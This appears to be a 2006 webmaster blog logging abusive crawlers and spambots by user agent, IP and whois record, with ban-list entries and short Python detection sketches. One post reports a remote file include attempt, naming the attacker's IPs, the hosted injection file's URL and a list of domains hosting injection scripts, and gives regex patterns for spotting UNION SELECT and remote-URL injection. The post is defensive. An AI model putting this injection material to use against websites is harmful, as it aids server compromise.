Everyone knows the famous PHP phpinfo(), which provide the programmer with invaluable information about his server configuration and set up. This is a useful tool as soon as one get a new server, and it is also a tool to talk with any administrator.

Yet, after usage, it is usually recommended to remove it, or to restrict its access to few people. Indeed, phpinfo may be dangerous by itself : in other times, it was even flawed with XSS injections. Even when secured, phpinfo() publish information about your architecture, and it is always recommended to keep it from privy eyes.

Sadly enough, the common habit to set up a phpinfo page on every web site is now so widely spread that even search engines are starting to pick them up : there are literally thousands of phpinfo indexed on Yahoo and Google. Just hit a search with the words 'phpinfo()' 'GoogleBot' and



So this bot reads the phpinfo script that you forgot to remove and compiles all your server's info.

customhostingservers.com guestbook spammers

Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)
1530-29-1.customhostingservers.com 216.32.76.202

Looks like this is a heavy guestbook spammer.

The website has nothing but an image file that gives an address to report abuse. Is this a real hosting company? If so, why doesn't it have a real website?

I am banning this domain based on the guestbook spamming I am seeing on other sites.

schibstedsokbot Just what is this

schibstedsokbot (compatible; mozilla/5.0; msie 5.0; fast freshcrawler 6; +http://www.schibstedsok.no/bot/)
sch-fast-se-crawl02.osl.basefarm.net 81.93.168.72
sch-fast-se-crawl04.osl.basefarm.net 81.93.168.74


The website this bot says it comes from doesn't exist, so what is this bot?

Also basefarm.net doesn't have a website.

Oct 26, 2006

clarissa.empyreum.com bot

silk/1.0
clarissa.empyreum.com 194.213.194.206

A look at the site's webpage at empyreum.com says:

Typical performance of the Crawler technology is 1 - 5 thousands documents (www pages) per second on a single conventional server with UNIX operation system.

Some internet resources perform real-time user agent behaviour analysis in order to identify automated crawler systems based on request delay measuring and / or traversing method detection.

EMPYREUM Crawler technology therefore supports many advanced techniques including virtual user emulation allowing customer to monitor selected public information silently



That's really something to brag about: a bot that breaks into your site and pretends to be a browser. Nothing on this site says why they are spidering me, so this domain is added to the domain ban.

Also I have not yet found out where silk comes from but it may also be banned.

209-103-237-195.excel.net spambot?

mozilla/4.0 (compatible ; msie 6.0; windows nt 5.1)
209.103.237.195 209-103-237-195.excel.net

This bot fell right into the bot traps. It's also blocked by BB.
Excel.net is an ISP in Sheboygan and Plymouth, Wisconsin.
So this looks like a DSL line.

Have to watch this one..

pdxg1n-o.webtrends.com What is it? Scraper?

400 Required header 'Accept' missing
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
63.88.212.164 pdxg1n-o.webtrends.com

The Webtrends robot fakes a useragent and doesn't send the proper headers, so it cannot pass Bad Behavior scanning.

From looking at the site, it says nothing about a cloaked robot. So what are they doing on my site?

For now, based on all the text on the website about helping you get a top position, it looks like they may be scraping other sites to get content to raise you in the listings. This would make them a scraper. If that's not what's going on, someone explain it.

Why do they hide what they are doing?

Amazon bots don't get the point

nutchec2test/nutch-0.9-dev (testing nutch on amazon ec2.; http://lucene.apache.org/nutch/bot.html; ec2test at lucene.com)
216.182.236.46 domU-12-31-34-00-00-6A.usma2.compute.amazonaws.com

Now look here, Amazon, you're not going to get in my site or others using that crappy bot. You need to create your own useragent with a link to a page explaining what you are doing on my site. Otherwise you will get a brick wall.

Oct 21, 2006

zippy2.cs.cornell.edu abuse

wget/1.8.2
128.84.97.129 zippy2.cs.cornell.edu

So cornell.edu, why are you trying to download my entire website?
GET LOST!

Edacious & Intelligent Web Robot (what a joke)

Mozilla/4.0 (compatible; EDI/1.6.6; Edacious & Intelligent Web Robot; Daum Communications Corp.- Korea)
222.231.42.12

This bot can't even send the proper headers.
The website doesn't say anything about a bot.

Oct 17, 2006

mozilla/4.0 (compatible; msie 6.0; windows nt)

mozilla/4.0 (compatible; msie 6.0; windows nt) ::elnsb50::000061100320025802a00111000000000507000900000000
83.167.112.156

mozilla/4.0 (compatible; msie 6.0; windows nt) ::elnsb50::000061100320025802a00111000000000507000900000000
66.110.119.170 gauntlet.angolatelecom.com

mozilla/4.0 (compatible; msie 6.0; windows nt) ::elnsb50::000061100320025802a00111000000000507000900000000
219.153.13.45


Agent: mozilla/4.0 (compatible; msie 6.0; windows nt) ::elnsb50::000061100320025802a00111000000000507000900000000
83.167.112.156

mozilla/4.0 (compatible; msie 6.0; windows nt) ::elnsb50::000061100320025802a00111000000000507000900000000
201.21.208.95 C915D05F.poa.virtua.com.br

The above bot came in claiming to be Windows NT. Microsoft says no such useragent was ever built. When they were blocked they tried again using several other IPs, thinking it was an IP ban.

gauntlet.angolatelecom.com is an open proxy.
virtua.com.br is identified with guestbook spamming.

topicblogs/0.9 Email harvester or scraper?

topicblogs/0.9
72.36.205.226 226.205.36.72.reverse.layeredtech.com

topicblogs has no real working website, just an email collection system to trick you into giving them your email address.

We throw this into our list of fake startup companies running scraper and email harvester bots. If it was a valid bot it would have a link to a real working webpage.


Also layeredtech.com is banned for abusive bots.

Oct 14, 2006

tellusioncrawler/1.0 bot

tellusioncrawler/1.0
wildebeest.gnoos.com.au 64.34.161.44

http://www.gnoos.com.au/ looks to be some type of search system for blogs.

Oct 13, 2006

Internet Explorer 6 (MSIE 6; Windows XP) abusive bot

Internet Explorer 6 (MSIE 6; Windows XP)

The above useragent was sent by Web Scrapper +
I have tested this software and it created the above fake invalid useragent.
BB stops it dead.

Oct 12, 2006

vodka.fark.com bot

Prohibited header 'Range' present

FARK.com link verifier; see http://www.fark.com/farq/tech.shtml
207.58.150.113 vodka.fark.com

Looks like more drunk on vodka bots this time from fark.com

I don't use fark, but its link checker will never verify anything because its improper headers are blocked by BB.

dedicatedcentral.com abuse

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)
216.139.224.70 ip-d88be046.dedicatedcentral.com

The above bot fell right into the bot trap, and then tried to scan the other sites.

On the 15th failure it tried to submit an order for a giveaway I am running.
How strange. It must be a spider with a human monitoring it.

Actual name and address removed, but the address was in Boston.
spam=[+city=Boston&+state=OK&+zip=02116&]

dedicatedcentral.com has no A record or website. So what is it?
| Domain Name: dedicatedcentral.com
| Created on .............Tue Jul 22 14:27:43 2003
| Expires on .............Fri Jul 22 14:27:43 2011
| Record last updated on .Tue Sep 26 17:15:13 2006
| Status .................LOCK
|
| Administrative Contact:
| DomainPeople, Inc.
| Dom Reg
| 200-550 Burrard Street
|
| Vancouver, BC
| V6C2B5, CA
| (604)6391680
| ()
| hostway-cdm@domainpeople.com
|
| Technical Contact:
| DomainPeople, Inc.
| Dom Reg
| 200-550 Burrard Street
|
| Vancouver, BC
| V6C2B5, CA
| (604)6391680
| ()
| hostway-cdm@domainpeople.com
|
| Domain servers in listed order:
| a.ns.dedicatedcentral.com 216.139.254.200
| b.ns.dedicatedcentral.com 216.139.223.11
|
| (dedicatedcentral.com)


The IP is from Texas.

OrgName: SouthWeb Ventures
OrgID: SOUTH-29
Address: 501 Waller St
City: Austin
StateProv: TX
PostalCode: 78702
Country: US

NetRange: 216.139.208.0 - 216.139.255.255
CIDR: 216.139.208.0/20, 216.139.224.0/19
NetName: SOUTHWEB-AUSTIN
NetHandle: NET-216-139-208-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
NameServer: A.NS.SOUTHWEBVENTURES.COM
NameServer: B.NS.SOUTHWEBVENTURES.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2000-06-28
Updated: 2005-10-25

OrgAbuseHandle: ABUSE548-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-512-469-9939
OrgAbuseEmail: abuse@southwebventures.com

OrgTechHandle: NOC1501-ARIN
OrgTechName: NOC
OrgTechPhone: +1-512-469-9939
OrgTechEmail: noc@southwebventures.com


The southwebventures.com website is blank.

Because of all the above, and with no clear idea what this is (is it an ISP? It can't be with no website), the domain will be added as an abusive bot.


dedicatedcentral.com,Unknown abusive bots

Oct 11, 2006

Guestbooks a thing of the past?

With all the spam, guestbooks have become a thing of the past, because unless you are going to moderate them they will fill with thousands of spam and trackback messages.

Once your system fills up with spam, your webspace will be used up and your bandwidth will go way up as others load the huge pages of spam.
Once the search systems see you linking to this spam, your page will go down in the ratings, as you will be identified with the spammers. Even if you moderate, if the spam stays on your site for more than a day your domain could be damaged by it.

I switched off all my guestbooks and converted to WordPress because it has spam plugins that are mostly automated. This still allows users to comment but doesn't take up all my time watching for spam.

I suggest WordPress with Spam Karma and Bad Behavior.

Just post a message for your new guestbook and link to that post from your old guestbook link.


It would be nice if someone would write a new guestbook program that could work with the WordPress anti-spam plugins, but until they do I recommend everyone shut down their guestbooks and convert to WP.

Having these old guestbooks up is encouraging all the guestbook spammers.

Union injection hackers

A hacker not already noted in your blog tried to hack my site last week by trying to inject code into my PHP page. If you are interested, here are their IPs and domain name: 66.110.9.76 89.108.91.144 202.8.85.44 Domain icezinhu.by.ru. They tried the injection with this text file: http://icezinhu.by.ru/ice.txt


I checked the url and the hack file no longer exists. If you have not already installed M&M Autoban you should because it will let you scan for all of those hacks.

I am adding the domain by.ru as a hacker website. Here is the current list of sites hosting the injection scripts. For those that don't understand: they will post a union injection into your script with the URL of a text file to run. Your poorly written script will then run that file and they will get full access to your server.

void.ru
paupal.info
expl0itz.com
echo.or.id
200.72.130.29
persiangig.com
fullcrew.net
paginas.aol.com.br
shikoe.net
by.ru

M&M Autoban scans all the POST and GET data strings looking for anything that might be an injection.
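To give an idea of what scanning a request string for injections can look like, here is a minimal Python sketch. It is not M&M Autoban's code. The function name `looks_like_injection` and both patterns are assumptions: one looks for UNION SELECT with whitespace or SQL comments in between, the other for a parameter value that points at a remote URL. The second pattern will also flag honest redirect parameters, so treat a hit as something to review.

```python
import re
from urllib.parse import unquote

# Hypothetical patterns, not taken from any real ban tool.
# UNION ... SELECT separated by whitespace or SQL comments such as /**/.
UNION_SELECT = re.compile(r"union(\s|/\*.*?\*/)+select", re.IGNORECASE)
# A parameter whose value starts with a remote URL (remote file include).
REMOTE_URL = re.compile(r"=\s*(https?|ftp)://", re.IGNORECASE)

def looks_like_injection(query_string):
    """Return True if the GET or POST data string matches either pattern."""
    # Decode %XX escapes first so encoded payloads are checked as well.
    decoded = unquote(query_string)
    return bool(UNION_SELECT.search(decoded) or REMOTE_URL.search(decoded))
```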

ns.metalsusa.com abuse

Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
63.123.84.196 ns.metalsusa.com

Why are metal roofing companies like metalsusa.com sending bots to our sites?


Microsoft useragents explained

As per the Microsoft website, they have never used a useragent that identified itself as Windows NT without a version number after the NT, so any useragent with this in it is fake. So we will now start looking for fake agents containing the following.

Windows NT) or Windows NT;

If anyone has anything else on this please post it.
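The check described above is easy to sketch. This is a minimal Python version; the function name `has_bare_windows_nt` is only for illustration, and the match is case-insensitive because the agents in this log show up in both upper and lower case.

```python
import re

# "Windows NT" followed directly by ")" or ";" means no version number follows.
BARE_WINDOWS_NT = re.compile(r"windows nt[;)]", re.IGNORECASE)

def has_bare_windows_nt(user_agent):
    """Return True if the useragent claims Windows NT without a version."""
    return bool(BARE_WINDOWS_NT.search(user_agent))
```

A real agent such as "Windows NT 5.1" has a space and a version after the NT, so it does not match.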

Oct 10, 2006

dabworx.com abuse

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
66.98.212.79 dabworx.com

The above bot is a guestbook spammer.


The useragent is seen a lot from bots and I am beginning to wonder if any real browsers even use this useragent.

net::trackback/1.01 abuse

net::trackback/1.01
209-9-169-114.sdsl.cais.net 209.9.169.114
209-9-169-124.sdsl.cais.net 209.9.169.124

Clearly some type of scraper tool in HK.

Added to ban list.

What is sdsl.cais.net?
What is cais.net?

I think the entire domain needs to be banned.

PCCW-HKT DataCom Services Limited
39/F PCCW Tower, Taikoo Place
979 King's Rd
Quarry Bay, Hong Kong 0
HK

xbox.dedi.inhoster.com / xbox.inhoster.com abuse

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)
85.255.117.226 85.255.117.226-xbox.dedi.inhoster.com


This xbox robot comes in posting its trackback links to the contact forms but not the blogs. It doesn't understand the error messages it gets or that it is wasting its time; it just keeps hitting the contact form every few days or so.

There should really be no traffic from inhoster.com since it's not an ISP, so it's blocked.
Scrapers have also been reported on this domain.

Update: Trackback spam now pouring in using a trackback agent.

net::trackback/1.01
85.255.114.132 85.255.114.132-xbox.dedi.inhoster.com
net::trackback/1.01
85.255.114.131 85.255.114.131-xbox.dedi.inhoster.com
net::trackback/1.01
85.255.114.133 85.255.114.133-xbox.dedi.inhoster.com
net::trackback/1.01
85.255.114.134 85.255.114.134-xbox.dedi.inhoster.com

net::trackback/1.01
85.255.113.78 85.255.113.78-xbox.inhoster.com
net::trackback/1.01
85.255.113.77 85.255.113.77-xbox.inhoster.com
net::trackback/1.01
85.255.113.76 85.255.113.76-xbox.inhoster.com


I also recommend adding these IPs to your server's IP ban.

inhoster.com,Used by scraper robots - Trackback Spam

random useragents from mail.midlandsteel.com

da4pxbtx4dbp iun xgt hifgbggalg4gcq
mail.midlandsteel.com 216.226.39.146

We see this a lot: random useragents created by spam bots.
It's not clear why the mail server from midlandsteel.com is visiting our site with one, but I thought I would post a notice about it.

For the most part random useragents are now under control and can be blocked by BB.

bb.answers.com 64.34.162.210 abuse bot

mozilla/4.0 (compatible; msie 5.5; windows nt 5.0)
bb.answers.com 64.34.162.210

Answers.com is sending out a robot with a FAKE useragent.

Nothing on the site explains why they are doing this or why they must fake a useragent.

Oct 9, 2006

ev1servers.net abuse

More info on the Evel Server

This domain was banned some time ago for sending out abusive bots. It's not clear if they are spam bots or trackbots. They have also been known to fake the Googlebot.

This domain is used by servers, not users, so everything from this domain is a bot and not a browser.

Well, today they started hitting a blog again and went nuts when blocked. They tried several IPs but never got in.

Abuse from this domain is very active.

mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.147 ev1s-209-85-54-147.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.132 ev1s-209-85-54-132.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.148 ev1s-209-85-54-148.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.145 ev1s-209-85-54-145.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.143 ev1s-209-85-54-143.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.140 ev1s-209-85-54-140.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.136 ev1s-209-85-54-136.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.148 ev1s-209-85-54-148.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.142 ev1s-209-85-54-142.ev1servers.net

Update:

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
67.15.119.25 ev1s-67-15-119-25.ev1servers.net

In the latest hits above the bots have gone nuts, inserting User-Agent: two times in front of the fake agent.

A Better Bot Trap that cannot be detected

I have been using the bot traps described by others only to find that the bots are avoiding them by scanning the robots file.

The solution is to unlist your robot trap. Oh yeah, you say, good bots will just fall into it. Well, that's OK: we just ignore the major search systems and only scan for useragents starting with mozilla. Once we ignore the major search systems and other bots known to use mozilla, everything that is left will be a bot faking a web browser and we can ban it.
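The filtering step for hits on the unlisted trap might look something like this rough Python sketch. The function name `should_ban_trap_hit` and the token list are assumptions for illustration only; the tokens are a few well-known crawler names, not the actual list used here.

```python
# Illustrative tokens only; this is not the real ignore list.
KNOWN_CRAWLER_TOKENS = ("googlebot", "slurp", "msnbot")

def should_ban_trap_hit(user_agent, crawler_tokens=KNOWN_CRAWLER_TOKENS):
    """Decide whether a hit on the unlisted trap page should be banned.

    Only agents starting with "mozilla" are considered, and any agent that
    names a known crawler is ignored. What is left claims to be a browser.
    """
    ua = user_agent.lower()
    if not ua.startswith("mozilla"):
        return False
    return not any(token in ua for token in crawler_tokens)
```

Since a useragent is easy to fake, a bot that names a known crawler would slip past this check, so it only covers the case described above.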

I have a beta test of the unlisted bot up and running and I will soon see what it does.

If this still doesn't work then bots must be avoiding the traps in other ways.

Update on this: no one has fallen into the new bot trap. This tells me that the bots are not really spidering from image links; they must be following links in from Google.
I am going to switch to using text links to the trap and see what I catch.

http: user-agent = mozilla/4.0 Fake useragent

http: user-agent = mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.0.3
65.54.225.173

This is a strange one. The useragent has http: and user-agent = in it. It's clearly an attempt to fake a useragent.

Stranger still, the IP is an MS IP, making it look more and more like MS IPs are being used to send spam.


Adding this check phrase to UA-Anywhere ban list.
user-agent =,unknown bot
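For anyone wondering how a "match anywhere" ban list like this works, here is a minimal Python sketch. It assumes the file format is one `phrase,reason` entry per line, which is inferred from the entries shown in these posts; the function names `load_ban_list` and `match_anywhere` are made up for illustration.

```python
def load_ban_list(lines):
    """Parse 'phrase,reason' lines into a list of (phrase, reason) pairs."""
    entries = []
    for line in lines:
        line = line.strip()
        if not line:
            continue  # skip blank lines
        # Split on the first comma only, so the reason may contain commas.
        phrase, _, reason = line.partition(",")
        entries.append((phrase.lower(), reason))
    return entries

def match_anywhere(user_agent, entries):
    """Return the reason for the first phrase found anywhere in the agent."""
    ua = user_agent.lower()
    for phrase, reason in entries:
        if phrase in ua:
            return reason
    return None
```

With the entry above loaded, the agent starting "http: user-agent = mozilla/4.0" matches and a normal MSIE agent does not.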

hn.kd.dhcp abuse

mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
hn.kd.dhcp 61.54.11.169

This is not a real domain, but if you see it, it's a giveaway for spam.
Add this to your domain ban.

reverse.layeredtech.com snoopy v1.2.3 Abuse

POST HTTP/1.0
snoopy v1.2.3
72.232.60.162 162.60.232.72.reverse.layeredtech.com

This bot came in using snoopy and tried to post 6 loads of spam to the blog.
A legit snoopy agent would never post to your blog. Because the latest spam bots have started using the snoopy useragent it is now banned.


layeredtech.com is not an ISP. It's a hosting company where abusers are setting up bots to abuse websites. The domain needs to be added to the domain ban list.


reverse.layeredtech.com,unknown bots
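A domain ban entry like the one above has to catch every host under the banned domain, since the bots show up as different subdomains. A minimal Python sketch of that matching follows. The function name `domain_ban_reason` is hypothetical, and the hostname is assumed to come from a reverse lookup done elsewhere.

```python
def domain_ban_reason(hostname, banned):
    """Return the ban reason for a reverse DNS hostname, or None.

    `banned` maps a domain to its reason. A host matches if it is the banned
    domain itself or any subdomain of it.
    """
    host = hostname.lower().rstrip(".")
    for domain, reason in banned.items():
        # Require a dot before the domain so "notexample.com" does not
        # match a ban on "example.com".
        if host == domain or host.endswith("." + domain):
            return reason
    return None
```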

IconSurf/2.0 favicon monitor (abuse)

400 Prohibited header 'Range'
IconSurf/2.0 favicon monitor (see http://iconsurf.com/robot.html)
12.146.74.139 xoba.com

The above robot is blocked by Bad Behavior due to improper headers.

I suggest that the useragent and domain name also be added to the block list.

This website indexes your .ico files and then hotlinks to them from its site. Resulting hotlinking will run up your bandwidth.

If you have not done so already suggest adding .ico to any hotlink protection system you are running. If you are not running one you really need to.


The site says they will honor the robots file, so you should also add these lines to it.

User-agent: IconSurf
Disallow: /

Oct 7, 2006

security-lab1.juniper.net abuse

python-urllib/1.16
208.223.208.181 security-lab1.juniper.net

The above bot fell into a bot trap. In order to do this it had to violate the rules in the robots.txt file. It is not clear why www.juniper.net is sending out a bot.

I have written to them and am waiting for a reply on what this thing is and why it was caught in an improper crawl.

In the meantime python-urllib/1.16 is added as an email harvester, since that's what I find about that useragent on other sites.

203.117.201.35 mx1.khattarholdings.com abuse

Missigua Locator 1.9
203.117.201.35 mx1.khattarholdings.com

The locator agent is thought to be an email harvester. However, this IP is connected with guestbook spam. The domain has no website and is from Singapore.
Registrant:
KHATTAR HOLDINGS PRIVATE LIMITED (KHATTARH272)
80 RAFFLES PLACE
#25-01 UOB PLAZA 1
SINGAPORE, , 048624
SG


Domain added to domain ban

User-Agent: Mozilla/4.0 abuse

What do you think of this one? Is it a bad robot?
IP: 72.13.32.7
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)


If you see a useragent with User-Agent: inside the agent itself, then it's a known robot.
We are not sure what its doing.

Oct 4, 2006

sdcresearchlabs-testbot abuse

sdcresearchlabs-testbot/0.8-dev (www.shopping.com/bot.html; http://lucene.apache.org/nutch/bot.html; researchbot@shopping.com)
72.5.173.21

As part of our ongoing efforts to improve the buying experience for shoppers online, Shopping.com is experimenting with new ways to collect and aggregate data through web crawling. At this point we do not plan on integrating inventory from our web crawling index with inventory


Say what! You pirate our content and bandwidth for your own internal test and don't even plan to index the data on your website. Now that's what you call abuse.

Why on earth should we allow you to do that?

Shopping.com is a pay site. You have to pay to get listed, unlike on Google's Froogle where it's free. Stay off my site unless you want to pay me or actually list the info on your site!

To start with, you're using nutch, a free package you downloaded. Nutch is banned from all my sites.

And you were not even scanning my store, you were scanning a local blog. How lame is that?

How often will sdcresearchlabs-testbot access my web pages?
For most sites, sdcresearchlabs-testbot shouldn't access your site more than once every few seconds on average.


What the ________? ONCE every FEW SECONDS? Do you know how much bandwidth that is?
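To put a rough number on it, here is a quick Python sketch of the arithmetic. The figures are my own assumptions, not anything Shopping.com states: "every few seconds" is taken as one hit every 3 seconds, and the average page is taken as 50 KB.

```python
SECONDS_PER_DAY = 24 * 60 * 60

def daily_load(seconds_between_hits, avg_page_kb):
    """Return (requests per day, megabytes per day) for a steady crawl rate."""
    requests = SECONDS_PER_DAY // seconds_between_hits
    megabytes = requests * avg_page_kb / 1024
    return requests, megabytes

# Assumed figures: one hit every 3 seconds, 50 KB per page.
requests, megabytes = daily_load(3, 50)
print(requests, "requests and about", round(megabytes), "MB per day")
```

Under those assumptions that is 28,800 requests and roughly 1.4 GB a day from one bot, if it kept that pace around the clock.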



They say you should add "sdcresearchlabs-testbot" to your robots file. I am going to try that and see what it does.

Oct 2, 2006

net-sweeper.com is content filtering remove from domain ban

When this one was added, the robot on this domain was caught in DoS attacks.
See here. It now looks like the bot was just broken and this is some type of content filtering for schools and businesses. So it is being removed from the ban list; adjust yours.

Also see this list of bad bots, where it is listed as not looking at the robots file. I will be monitoring to see if it falls into a bot trap.


Remove from domain ban file
net-sweeper.com,Hides what it is was caught in DOS atacks.

vodka.ietsmetinternet.nl abuse bot drunk on vodka

66.232.113.20 vodka.ietsmetinternet.nl

The above bot has started scanning with no useragent. It is not clear what it's trying to do, but it keeps coming back even though it gets a blocked screen. Must be drunk on vodka.

A search for this only shows this subdomain hitting other sites. The main website gives a file not found page.

The domain is added to the domain ban

ietsmetinternet.nl,unknown drunk on vodka bot.

ns1.input-box.com abuse

'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)'
81.177.34.184 ns1.input-box.com

This is a bot using a known useragent.

input-box.com has a blank page for a website so the entire domain is banned.


added to domain ban

input-box.com,Unknown bots

spokane.dailydns.com Blog abuse SPAM

snoopy v1.2.3
69.16.221.13 spokane.dailydns.com

This is a blog spammer using the useragent snoopy v1.2.3. We ban this useragent.
If you surf to the subdomain you will see a website that is not set up.
A Google search finds nothing on this subdomain. However, spam has been seen from other subdomains and the main domain is not really working, so I am banning it and all subdomains.


added to the domain ban.

dailydns.com,Blog spam website is down

Sep 29, 2006

Web Scrapers Violate the Digital Millennium Copyright Act

The Digital Millennium Copyright Act makes it a crime to create software
that allows a user to get around any copy protection used to stop
theft of copyright content.

Companies that create bots that fake useragents to get around our blocks
violate the DMCA.

We need a class action lawsuit against the software authors that create web scrapers.

geosign-v47.fibrewired.on.ca abuse unknown bot

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca

Robot fakes useragents.
Loads the robots.txt file and then loads files it is told not to.
Has fallen into the bot trap several times.
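Checking whether a request broke the robots.txt rules can be sketched with Python's standard `urllib.robotparser` module. The helper name `violates_robots` and the `/trap/` path in the example are assumptions for illustration; the real trap path is not given here.

```python
from urllib.robotparser import RobotFileParser

def violates_robots(robots_txt, user_agent, path):
    """Return True if fetching `path` breaks the rules in `robots_txt`."""
    parser = RobotFileParser()
    # parse() takes the file as a list of lines; no network access is needed.
    parser.parse(robots_txt.splitlines())
    return not parser.can_fetch(user_agent, path)

# Hypothetical robots.txt that tells every robot to stay out of /trap/.
ROBOTS = "User-agent: *\nDisallow: /trap/\n"
print(violates_robots(ROBOTS, "mozilla/4.0 (compatible; msie 6.0)", "/trap/index.html"))
```

A bot that loads the robots file and then requests a disallowed path, as this one did, shows up as a violation.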

This bot holds this IP and is hosted on fibrewired.on.ca
Canada

added to domain ban

geosign-v47.fibrewired.on.ca,Unknown Canada bot

static.theplanet.com kostanay spam

ThePlanet is offering internet access to businesses, so we have to be careful about banning that domain.

Verified list of robots that need to be banned

70.86.137.162
a2.89.5646.static.theplanet.com


Update: I am fed up with this bot. It's trying to place orders on my store using only a name and city, and is copying all the keys off the pages.
92.3f.5746.static.theplanet.com 70.87.63.146
name : alex
city : kostanay

So everything from static.theplanet.com is now banned.

name=ahmet
city=kostanay
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)
70.87.63.146 92.3f.5746.static.theplanet.com

reversedns.resolve.ru abuse

NO AGENT-
72.36.245.205 72.36.245.205.reversedns.resolve.ru

Resolve Ltd. is a Russian hosting company which appears to be involved in fraud schemes. A search on the IP address will return a lot of spammed guestbooks, mostly for pills. Apparently the spammer specialised in targeting the Advanced Guestbook script. The bot is using both random user agents and proxy servers, and the referrer pointed to the domain hitairfare.com.

This robot was caught scanning with no agent, which is automatically blocked. To prevent entry by any of its other fake agents, the domain needs to be added to the domain block list.

reversedns.resolve.ru,guestbook spam and Fraud

Sep 27, 2006

Just what is btcentralplus.com

We receive a lot of abuse from this domain and a lot of webmasters are blocking it.
But since the domain has no website it was not clear what it was.
After a long search I have discovered that it's British Telecom DSL.
See DSL report page. This was the only site that told what it was.

Why the lame techs at BT don't have a website at that domain is confusing, because not knowing what it is gets BT customers globally banned.

btcentralplus.com should not be banned as it is an ISP.
It is not clear yet if DSL modems keep the same IP, so we have to ban by IP until we know.

To the folks at BT: please put a website at www.btcentralplus.com

Sep 25, 2006

necbot/1.0 (nec labs america)

necbot/1.0 (nec labs america)
All Hits From svext.nec-labs.com 138.15.10.10

I can find no info on this bot.

The IP is registered to NEC, but it's confusing as to why NEC has a bot. This might be banned later as we are not sure what it is.

OrgName: NEC Laboratories America, Inc.
OrgID: NLA-29
Address: 4 Independence Way
Address: Suite 200
City: Princeton
StateProv: NJ
PostalCode: 08540
Country: US

geosign-v47.fibrewired.on.ca bad bot

First the bot falls into a bot trap it found from reading the robots.txt file.
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

Just to make sure, it hits the bot trap again with another useragent
mozilla/4.0 (compatible; msie 5.0; windows xp) opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca


Then it tries to scan the site. Note how its user agent changes as it scans.

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

This one gets stopped by BB for improper headers
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

Stopped by BB
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

It just keeps hammering like this but never gets in.

So what is this bot doing?

Sep 24, 2006

baiduspider bad bot ignores robots.txt

baiduspider+(+http://www.baidu.com/search/spider.htm)
202.108.11.106
202.108.11.108
60.28.17.43

This is a Chinese search system that indexes sites written in Chinese, I think.
Since my sites are in English I don't understand why it's trying to index me.

It says to add "baiduspider" to your robots file. I did this months ago but it's back.
It is ignoring the robots.txt file.

The above IPs are in the blacklist as spammers. See link. You have to click on OPEN RBL and then, when the second window opens, click on LOOKUP. This will display all the block lists in red.


It has been added to the useragent ban list and is blocked, but it just ignores the
error and keeps coming back. It's time to add the IPs to the server IP ban.

deny from 202.108.11.106
deny from 202.108.11.108
deny from 60.28.17.43

More work is needed to find all its IPs.

64.34.173.76 lucy.electroclash.us BOT

Mozilla/7.0
64.34.173.76 lucy.electroclash.us

What is this Mozilla 7? That's invalid. Some kind of bot. The website has what looks like a guestbook on its front page.

It hit 2 of my domains and was stopped by BB as invalid.

compatible; MSIE 6; Win32; Mck IS it a new bot?

User-Agent claimed to be MSIE- with invalid Windows version

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Mozilla/4.0(compatible; MSIE 6; Win32; Mck); .NET CLR 1.1.4322; InfoPath.1)

What is this useragent? It first looks ok stating
compatible; MSIE 6.0; Windows NT 5.1;
But then it has a second part which looks like the useragent is starting over.
Mozilla/4.0(compatible; MSIE 6; Win32; Mck); .NET CLR 1.1.4322; InfoPath.1)
Inside this strange string is another browser version.
compatible; MSIE 6; Win32; Mck

What is MSIE 6? This is invalid.
What is Win32? This is also an invalid version.
What is Mck?
Why is Mozilla/4.0 repeated?

